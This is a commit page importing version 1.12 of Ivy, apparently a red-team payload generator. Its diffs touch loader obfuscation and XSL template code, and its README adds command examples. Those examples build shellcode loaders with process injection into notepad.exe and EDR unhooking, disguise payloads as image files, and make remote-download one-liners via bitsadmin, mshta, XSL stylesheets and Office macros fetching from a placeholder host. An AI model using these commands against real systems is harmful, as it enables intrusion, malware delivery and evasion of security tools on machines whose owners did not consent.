Commit 924eb720 authored by Nong Hoang Tu's avatar Nong Hoang Tu
Browse files

New upstream version 1.12

parent 5e727029
Pipeline #5473 failed with stages
......@@ -69,6 +69,7 @@ func randclassid() string {
}
func VarNumberLength(min, max int) string {
time.Sleep(2 * time.Millisecond)
var r string
rand.Seed(time.Now().UnixNano())
num := rand.Intn(max-min) + min
......@@ -79,7 +80,6 @@ func VarNumberLength(min, max int) string {
func StagelessArrayGen(data []byte) string {
var fmtStr string
//var StrSlice []string
aSlice := data
fmtStr = strings.Repeat("%d, ", len(aSlice)-1)
fmtStr += "%d"
......
......@@ -91,10 +91,12 @@ Their cries for mercy?
if opt.inputFile32 == "" && opt.inputFile64 == "" {
log.Fatal("Error: Please provide a path to a file containing a raw shellcode or payload")
}
if opt.outFile == "" {
log.Fatal("Error: Please provide a name for the payload the you wish to generate")
}
if opt.CommandLoader == "" || opt.CommandLoader == "bits" || opt.CommandLoader == "hta" || opt.CommandLoader == "macro" || opt.CommandLoader == "xsl" {
log.Fatal("Error: Invalid delivery command option, please choose one of the acceptable options")
}
if opt.inputFile32 != "" && opt.stageless == false {
Utils.PrintDebug(debugging, "Reading payload file %s\n", opt.inputFile32)
rawinputfile32 := Utils.Readfile(opt.inputFile32)
......
......@@ -53,6 +53,7 @@ type macro struct {
type sandbox struct {
Variables map[string]string
}
var buffer bytes.Buffer
//First
......@@ -71,7 +72,7 @@ func Java_Code_Buff(product string) (string, string, string, string, string, str
javacode.Variables["DecodedValue"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9)
javacode.Variables["Auto_Open"] = Cryptor.VarNumberLength(4, 9)
if product == "Excel" {
struct_option = Struct.Javacode_Start_Excel()
}
......@@ -403,7 +404,7 @@ func XSL_Code_Buff(compiled string) string {
xsl.Variables = make(map[string]string)
xsl.Variables["payload"] = compiled
buffer.Reset()
xslTemplate, err := template.New("xsl").Parse(Struct.HTA_Loader())
xslTemplate, err := template.New("xsl").Parse(Struct.XSL_Loader())
if err != nil {
log.Fatal(err)
}
......
......@@ -166,5 +166,77 @@ The delivery command line argument allows you to generate a command or string of
* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, then removed.
* XSL - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.
# Examples
### Staged Inject payload
```
./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js
```
### Staged Local payload
```
./Ivy -Ix64 test64.c -Ix86 test32.c -P Local -O SampleLocal.js
```
### Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js
```
### Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O stageless.js
```
### Stagless Injected payload spawning notepad.exe
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:\\windows\\system32\\notepad.exe -process32 C:\\windows\\SysWOW64\\notepad.exe -O stageless.js
```
### Unhooked Stagless Local payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -unhook -O stageless.js
```
### Unhooked Stagless Injected payload
```
./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -unhook -O stageless.js
```
## One Liner Commands Samples
### Non-Executable File Types
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless
```
### Bitsadmin Command
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.js -url http://ACME.com -delivery bits -stageless
```
### MSHTA.exe Command
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.hta -url http://ACME.com -delivery hta -stageless
```
### Stylesheet Payload
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.xsl -url http://ACME.com -delivery xsl -stageless
```
### Macro Web Downloader
```
./Ivy -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O test.txt -url http://ACME.com/test.txt -delivery macro -stageless
```
# Known Issues
Currently there is a known issue with unhooking the remote injected process. A current work around is to load the [unhook](https://github.com/rsmudge/unhook-bof) BOF, for now.
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment